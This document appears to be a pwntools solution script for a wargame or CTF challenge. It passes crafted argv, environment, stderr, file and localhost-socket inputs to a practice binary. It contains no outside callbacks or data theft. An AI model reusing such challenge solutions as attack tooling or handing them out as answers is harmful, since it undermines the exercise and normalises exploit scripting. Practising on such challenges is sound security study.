exploit code

# -*- coding: utf-8 -*-
from pwn import *
 
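# TCP port shared by stage1 (placed into the target's argument list) and
# stage5 (connected to on localhost). Kept as a string because it goes into
# argv unchanged; stage5 converts it with int().
# A module-level `global` statement has no effect, so a plain assignment
# is all that is needed here.
port = "8080"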
 
def stage1():
    """Build the argument vector handed to the target process.

    Returns a 100-element list: the target path followed by 99 filler
    arguments ("0" .. "98"), with the entries at indexes 65, 66 and 67
    overridden.
    """
    argv = ['/home/input2/input'] + [str(n) for n in range(99)]
    # 65, 66 and 67 are the character codes of 'A', 'B' and 'C'; presumably
    # the target indexes argv by those characters - confirm against its source.
    argv[65:68] = ["\x00", "\x20\x0a\x0d", port]  # last entry: port used by stage5
    return argv
 
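def stage2():
    """Create the file that is attached as the target's stderr.

    Writes four bytes to a file named ``stderr`` in the current working
    directory and returns that file reopened for reading; main() passes the
    handle as the ``stderr=`` argument of process(). The caller owns the
    returned handle and is responsible for closing it.
    """
    # Binary mode keeps the bytes exactly as written (no newline or text
    # encoding translation), and `with` closes the writer even if write()
    # raises, so the data is flushed before the file is reopened.
    with open("stderr", "wb") as sink:
        sink.write(b"\x00\x0a\x02\xff")
    return open("stderr", "rb")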
 
def stage3():
    """Return the environment mapping given to the target process.

    The mapping holds a single variable; both its name and its value are
    four non-printable characters.
    """
    name = '\xde\xad\xbe\xef'
    value = '\xca\xfe\xba\xbe'
    return {name: value}
 
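def stage4():
    """Create a file whose name is a single newline character (0x0a).

    The file is written to the current working directory and holds four
    NUL bytes. Nothing is returned.
    """
    # Binary mode writes the bytes verbatim; `with` closes (and flushes) the
    # file even if write() raises, so no handle is leaked.
    with open("\x0a", "wb") as out:
        out.write(b"\x00\x00\x00\x00")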
     
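def stage5():
    """Send one line to the TCP service on localhost at the shared port.

    Connects to ``localhost`` on ``int(port)``, sends the four-character
    payload followed by a newline (sendline), and closes the connection.
    """
    r = remote("localhost", int(port))
    try:
        r.sendline("\xde\xad\xbe\xef")
    finally:
        # Release the socket even if the send fails.
        r.close()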
 
def main():
    """Run the stages in order against a locally spawned target process."""
    # stage1 supplies argv, stage3 the environment and stage2 the file that
    # is attached as stderr; they are evaluated in that order.
    target = process(stage1(), env=stage3(), stderr=stage2())
    print(target.recv(1024))
    # Stdin counterpart of the bytes stage2 wrote to the stderr file.
    target.sendline("\x00\x0a\x00\xff") # stage2
    print(target.recvline(''))
    # The file must exist before the target's next output is read.
    stage4()
    print(target.recv(1024))
    # Network step: connects to the port that stage1 put into argv.
    stage5()
    target.interactive()
    target.close()
 
# Run the stages only when this file is executed as a script, not when it
# is imported as a module.
if __name__ == "__main__":
    main()

